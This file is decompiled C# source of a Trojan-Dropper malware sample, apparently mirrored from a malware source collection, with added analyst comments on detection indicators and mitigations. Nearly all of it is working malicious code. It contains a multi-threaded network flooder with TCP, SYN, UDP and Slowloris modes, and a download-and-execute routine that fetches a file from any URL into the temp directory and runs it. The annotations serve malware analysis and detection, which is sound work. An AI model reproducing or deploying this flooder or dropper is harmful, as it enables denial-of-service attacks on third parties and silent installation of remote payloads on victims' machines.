mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
// Decompiled with JetBrains decompiler
// Type: Poly.Function
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
namespace Poly
{
  /// <summary>
  /// Analyst annotations on a decompiled malware module (see the decompiler header for the
  /// sample name and hash). The class bundles two capabilities:
  /// (1) a multi-threaded network flooder with four modes (TCP, SYN, UDP, Slowloris), and
  /// (2) a download-and-execute / self-update helper with an optional MD5 check.
  /// All state is static, so one process runs at most one flood configuration at a time.
  /// The code is left exactly as decompiled; only comments were added.
  /// </summary>
  public static class Function
  {
    // Run flag polled by every worker thread; cleared by InitFlood and Abort, set by Begin.
    private static bool active;
    // Flood target host name or address, set by InitFlood.
    private static string host;
    // Flood target port, set by InitFlood.
    private static int port;
    // Number of worker threads backStart tries to create (one socket loop per thread).
    private static int sockets;
    // Pause in milliseconds (passed to Thread.Sleep) after each burst in stress().
    private static int timeout;
    // Number of sends per burst in the TCP and UDP modes.
    private static int packets;
    // Flood mode selected by InitFlood.
    private static Function.Type currentType;
    // Launcher thread created by Begin; it only spawns the workers (see backStart).
    public static Thread bThread;
    // Second half of the User-Agent value used by GenerateRequest. Detection note: the
    // entries are legacy browser strings, and two of the MSIE 8.0 entries are identical.
    private static string[] userAgents = new string[28]
    {
      "(compatible; MSIE 6.0; Windows NT)",
      "(Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
      "(Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
      "(MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
      "[en] (WinNT; U)",
      "(compatible; MSIE 7.0; Windows NT 5.1; bgft)",
      "(compatible; MSIE 6.0; Win32)",
      "(X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
      "(X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801",
      "(SunOS 5.8 sun4u; U) Opera 5.0 [en]",
      "(compatible; Googlebot/2.1; http://www.google.com/bot.html)",
      "(X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 BAVM/1.0.0",
      "(X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
      "(Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Firefox/3.6",
      "Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326",
      "(Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50",
      "(Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
      "(X11; Linux x86_64; U; Linux Mint; en) Presto/2.2.15 Version/10.10",
      "(Macintosh; PPC Mac OS X; U; en) Opera 8.0",
      "(Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128",
      "(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
      "(iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3",
      "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
      "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
      "(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
      "(compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
      "(compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
      "(Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
    };
    // First half of the User-Agent value used by GenerateRequest. Detection note: product
    // token and comment are drawn independently, so implausible pairs (an "Opera/..." token
    // followed by an MSIE or Firefox comment) appear on the wire.
    private static string[] browsers = new string[10]
    {
      "Opera/9.0",
      "Opera/8.90",
      "Opera/9.80",
      "Opera/9.33",
      "Mozilla/5.0",
      "Mozilla/4.08",
      "Mozilla/4.0",
      "Mozilla/3.6",
      "Mozilla/3.1",
      "Mozilla/3.0"
    };

    /// <summary>True while a flood is running (set by Begin, cleared by InitFlood and Abort).</summary>
    public static bool Active => Function.active;

    /// <summary>The flood mode most recently configured through InitFlood.</summary>
    public static Function.Type CurrentType => Function.currentType;

    /// <summary>
    /// Returns the MD5 digest of the ASCII encoding of <paramref name="input"/> as 32
    /// upper-case hex characters. No caller is visible in this class.
    /// </summary>
    /// <param name="input">Text to hash; non-ASCII characters are replaced by the ASCII encoder before hashing.</param>
    /// <returns>Upper-case hexadecimal MD5 string.</returns>
    public static string MD5Hash(string input)
    {
      byte[] hash = MD5.Create().ComputeHash(Encoding.ASCII.GetBytes(input));
      StringBuilder stringBuilder = new StringBuilder();
      for (int index = 0; index < hash.Length; ++index)
        stringBuilder.Append(hash[index].ToString("X2"));
      return stringBuilder.ToString();
    }

    /// <summary>
    /// Name of the configured flood mode ("TCP", "SYN", "UDP" or "Slowloris"), or null for
    /// any other enum value.
    /// </summary>
    public static string CurrentTypeAsString
    {
      get
      {
        switch (Function.currentType)
        {
          case Function.Type.TCP:
            return "TCP";
          case Function.Type.SYN:
            return "SYN";
          case Function.Type.UDP:
            return "UDP";
          case Function.Type.Slowloris:
            return "Slowloris";
          default:
            return (string) null;
        }
      }
    }

    /// <summary>
    /// Stores the flood parameters in the static fields and clears the run flag. Nothing is
    /// sent until Begin is called. The values are stored without any validation.
    /// </summary>
    /// <param name="type">Flood mode.</param>
    /// <param name="Host">Target host name or address.</param>
    /// <param name="Port">Target port.</param>
    /// <param name="Sockets">Number of worker threads to create.</param>
    /// <param name="Packets">Sends per burst (TCP and UDP modes).</param>
    /// <param name="Timeout">Pause in milliseconds after each burst.</param>
    public static void InitFlood(
      Function.Type type,
      string Host,
      int Port,
      int Sockets,
      int Packets,
      int Timeout)
    {
      Function.currentType = type;
      Function.host = Host;
      Function.port = Port;
      Function.sockets = Sockets;
      Function.packets = Packets;
      Function.timeout = Timeout;
      Function.active = false;
    }

    /// <summary>
    /// Sets the run flag and starts the launcher thread (backStart), which creates the workers.
    /// </summary>
    public static void Begin()
    {
      Function.active = true;
      Function.bThread = new Thread(new ThreadStart(Function.backStart));
      Function.bThread.Start();
    }

    /// <summary>
    /// Clears the run flag and calls Thread.Abort on the launcher thread. The workers are not
    /// aborted here; they stop on their own once they observe that the run flag is false.
    /// </summary>
    public static void Abort()
    {
      Function.active = false;
      // bThread is only assigned in Begin, so it is still null if Begin never ran.
      Function.bThread.Abort();
    }

    /// <summary>
    /// Launcher: creates one background thread running stress() per configured socket.
    /// Host-side indicator: a sudden rise in the process's thread count equal to the
    /// configured socket count.
    /// </summary>
    private static void backStart()
    {
      for (int index = 0; index < Function.sockets; ++index)
      {
        try
        {
          new Thread(new ThreadStart(Function.stress))
          {
            IsBackground = true
          }.Start();
        }
        catch (OutOfMemoryException ex)
        {
          // Thread creation hit the memory limit: lower the recorded socket count and stop.
          Function.sockets = index - 1;
          break;
        }
      }
    }

    /// <summary>
    /// Worker loop. While the run flag is set it performs one burst for the configured mode,
    /// sleeps for the configured timeout, and repeats. Every mode uses ordinary
    /// System.Net.Sockets stream or datagram sockets; no raw socket is created, so traffic
    /// from these paths carries the infected host's own source address.
    /// </summary>
    private static void stress()
    {
      // Sends completed in the current burst; reset to 0 after each pass through the switch.
      int num = 0;
      while (Function.active)
      {
        switch (Function.currentType)
        {
          case Function.Type.TCP:
            // TCP mode: connect, send one random payload (see tcpRandom), close.
            // Network indicator: short-lived connections that each carry 1470 bytes or more
            // of random data.
            Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            socket1.Blocking = false;
            while (num < Function.packets)
            {
              if (Function.active)
              {
                try
                {
                  socket1.Connect(Function.host, Function.port);
                  socket1.Send(Function.tcpRandom());
                  socket1.Close();
                  socket1 = (Socket) null;
                }
                catch
                {
                  socket1.Close();
                  break;
                }
                ++num;
                Thread.Sleep(1);
              }
              else
                break;
            }
            Thread.Sleep(Function.timeout);
            break;
          case Function.Type.SYN:
            // "SYN" mode: starts an asynchronous connect with a no-op callback, waits 100 ms,
            // then disconnects (if the connect completed) and closes the socket. Despite the
            // name this is a normal OS-stack connection attempt, so the target sees
            // connections opened and dropped within about 100 ms. Errors are swallowed.
            Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            socket2.Blocking = false;
            try
            {
              socket2.BeginConnect(Function.host, Function.port, new AsyncCallback(Function.onConnect), (object) null);
            }
            catch
            {
            }
            Thread.Sleep(100);
            try
            {
              if (socket2.Connected)
                socket2.Disconnect(false);
              socket2.Close();
            }
            catch
            {
            }
            Thread.Sleep(Function.timeout);
            break;
          case Function.Type.UDP:
            // UDP mode: sends up to `packets` datagrams of random bytes (see udpRandom) to
            // the target, 1 ms apart. Payloads are 1470 bytes or larger, so a typical
            // 1500-byte MTU link would carry them as IP fragments - NOTE(review): confirm in
            // a capture.
            Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
            socket3.Blocking = false;
            Socket socket4;
            try
            {
              socket3.Connect(Function.host, Function.port);
              while (num < Function.packets && Function.active)
              {
                socket3.Send(Function.udpRandom());
                ++num;
                Thread.Sleep(1);
              }
              socket3.Close();
              socket4 = (Socket) null;
            }
            catch
            {
              socket3.Close();
              socket4 = (Socket) null;
              break;
            }
            Thread.Sleep(Function.timeout);
            break;
          case Function.Type.Slowloris:
            // Slowloris mode: opens a connection, sends the header block built by
            // GenerateRequest, then re-sends a fresh block every 2000 ms while the socket
            // stays connected and the run flag is set. The block never ends with an empty
            // line, so the server keeps waiting for the request to complete. Server-side
            // mitigations are header-read timeouts and per-client connection limits.
            Socket socket5 = (Socket) null;
            try
            {
              socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
              socket5.Connect(Function.host, Function.port);
              socket5.Send(Function.GenerateRequest());
              while (socket5.Connected)
              {
                if (Function.active)
                {
                  socket5.Send(Function.GenerateRequest());
                  Thread.Sleep(2000);
                }
                else
                  break;
              }
            }
            catch
            {
              socket5.Close();
            }
            Thread.Sleep(Function.timeout);
            break;
        }
        num = 0;
      }
      // Reached once the run flag was seen as false; Abort() is called only if another
      // thread set the flag again in the meantime.
      if (!Function.active)
        return;
      Function.Abort();
    }

    /// <summary>Empty completion callback for the BeginConnect call in the SYN mode.</summary>
    private static void onConnect(IAsyncResult ar)
    {
    }

    /// <summary>
    /// Builds a UDP payload of 1470 to 65506 pseudo-random bytes (System.Random, not a
    /// cryptographic generator).
    /// </summary>
    private static byte[] udpRandom()
    {
      Random random = new Random();
      byte[] buffer = new byte[random.Next(1470, 65507)];
      random.NextBytes(buffer);
      return buffer;
    }

    /// <summary>
    /// Builds a TCP payload of 1470 to 65534 pseudo-random bytes (System.Random, not a
    /// cryptographic generator).
    /// </summary>
    private static byte[] tcpRandom()
    {
      Random random = new Random();
      byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
      random.NextBytes(buffer);
      return buffer;
    }

    /// <summary>
    /// Builds the ASCII header block sent by the Slowloris mode. Signature-relevant traits
    /// visible in the code:
    /// - request line is always "GET / HTTP/1.1";
    /// - a Content-Length header (1-999) on a GET that never carries a body;
    /// - a custom "X-a:" header with a random number (1-9999);
    /// - User-Agent is "browsers[i] userAgents[j]"; Random.Next excludes its upper bound, so
    ///   the last entry of each array is never selected;
    /// - the block ends with "Connection: keep-alive" and no line terminator, so a re-sent
    ///   block appears on the wire as "Connection: keep-aliveGET / HTTP/1.1".
    /// Line endings come from AppendLine, i.e. Environment.NewLine.
    /// </summary>
    private static byte[] GenerateRequest()
    {
      Random random = new Random();
      StringBuilder stringBuilder = new StringBuilder();
      stringBuilder.AppendLine("GET / HTTP/1.1");
      stringBuilder.AppendLine("Host: " + Function.host);
      stringBuilder.AppendLine("User-Agent: " + Function.browsers[random.Next(0, Function.browsers.Length - 1)] + " " + Function.userAgents[random.Next(0, Function.userAgents.Length - 1)]);
      stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
      stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
      stringBuilder.Append("Connection: keep-alive");
      return Encoding.ASCII.GetBytes(stringBuilder.ToString());
    }

    /// <summary>
    /// Downloads the file at <paramref name="URL"/> and starts it with Process.Start, without
    /// any integrity or origin check. Host-side indicator: a child process launched from a
    /// "*.tmp.exe" path in the temp directory (see download).
    /// </summary>
    /// <returns>True if no exception occurred; false otherwise.</returns>
    public static bool DlExecute(string URL)
    {
      try
      {
        Process.Start(Function.download(URL));
        return true;
      }
      catch
      {
        return false;
      }
    }

    /// <summary>
    /// Downloads the file at <paramref name="URL"/> and starts it only if its MD5 matches
    /// <paramref name="MD5"/>. The return value does not tell whether the file ran: true is
    /// also returned when the hash does not match and nothing is started.
    /// </summary>
    /// <returns>True if no exception occurred; false otherwise.</returns>
    public static bool DlExecute(string URL, string MD5)
    {
      try
      {
        string str = Function.download(URL);
        if (Function.verifyMD5(str, MD5))
          Process.Start(str);
        return true;
      }
      catch
      {
        return false;
      }
    }

    /// <summary>
    /// Fetches <paramref name="URL"/> with WebClient.DownloadFile and returns the local path,
    /// or string.Empty on any error. A value that does not parse as an absolute URI gets
    /// "http://" prepended. Forensic notes:
    /// - the destination is Path.GetTempFileName() + ".exe"; GetTempFileName itself creates
    ///   an empty temp file, so each download leaves a pair of files, the empty temp file
    ///   and the payload with ".exe" appended to the same name;
    /// - no request headers are set on the WebClient here;
    /// - the parsed URI is written to the console ("Url is : ...").
    /// </summary>
    private static string download(string URL)
    {
      string str = string.Empty;
      Uri result;
      bool flag = Uri.TryCreate(URL, UriKind.Absolute, out result);
      if (!flag)
        str = "http://" + URL;
      // `result` is null here when parsing failed; the prefixed value in `str` is not printed.
      Console.WriteLine("Url is : {0}", (object) result);
      if (flag)
      {
        try
        {
          string absoluteUri = result.AbsoluteUri;
          string fileName = Path.GetTempFileName() + ".exe";
          WebClient webClient = new WebClient();
          webClient.DownloadFile(absoluteUri, fileName);
          webClient.Dispose();
          return fileName;
        }
        catch
        {
          return string.Empty;
        }
      }
      else
      {
        try
        {
          string address = str;
          string fileName = Path.GetTempFileName() + ".exe";
          WebClient webClient = new WebClient();
          webClient.DownloadFile(address, fileName);
          webClient.Dispose();
          return fileName;
        }
        catch
        {
          return string.Empty;
        }
      }
    }

    /// <summary>
    /// Returns the MD5 of the file at <paramref name="path"/> as 32 lower-case hex characters.
    /// The file is opened with FileMode.Open and read through a 1,200,000-byte buffer.
    /// </summary>
    private static string getMD5(string path)
    {
      byte[] hash;
      using (Stream inputStream = (Stream) new BufferedStream((Stream) new FileStream(path, FileMode.Open), 1200000))
        hash = new MD5CryptoServiceProvider().ComputeHash(inputStream);
      StringBuilder stringBuilder = new StringBuilder();
      for (int index = 0; index < hash.Length; ++index)
        stringBuilder.Append(hash[index].ToString("x2"));
      return stringBuilder.ToString();
    }

    /// <summary>
    /// True when <paramref name="MD5"/> is 32 characters long and equals the file's MD5
    /// (ordinal, case-insensitive). Analyst note: the expected hash arrives alongside the
    /// URL, so this checks that the download is intact, not who produced it; MD5 is also
    /// not collision-resistant.
    /// </summary>
    private static bool verifyMD5(string ExecutablePath, string MD5)
    {
      // The file is hashed before the length of the expected value is checked.
      string md5 = Function.getMD5(ExecutablePath);
      return MD5.Length == 32 && StringComparer.OrdinalIgnoreCase.Compare(md5, MD5) == 0;
    }

    /// <summary>
    /// Downloads <paramref name="url"/> and returns the local path (string.Empty on failure).
    /// The file is not executed here; what the caller does with the path is not visible in
    /// this class.
    /// </summary>
    public static string Update(string url)
    {
      string str = Function.download(url);
      // Both branches yield the same value as `str`.
      return str == string.Empty ? string.Empty : str;
    }

    /// <summary>
    /// Downloads <paramref name="url"/> and returns the local path only if the file's MD5
    /// matches <paramref name="md5"/>; otherwise returns string.Empty. A file that fails the
    /// check is not deleted here, so it stays in the temp directory.
    /// </summary>
    public static string Update(string url, string md5)
    {
      string ExecutablePath = Function.download(url);
      return ExecutablePath == string.Empty || !Function.verifyMD5(ExecutablePath, md5) ? string.Empty : ExecutablePath;
    }

    /// <summary>Flood modes handled by stress().</summary>
    public enum Type
    {
      TCP,
      SYN,
      UDP,
      Slowloris,
    }
  }
}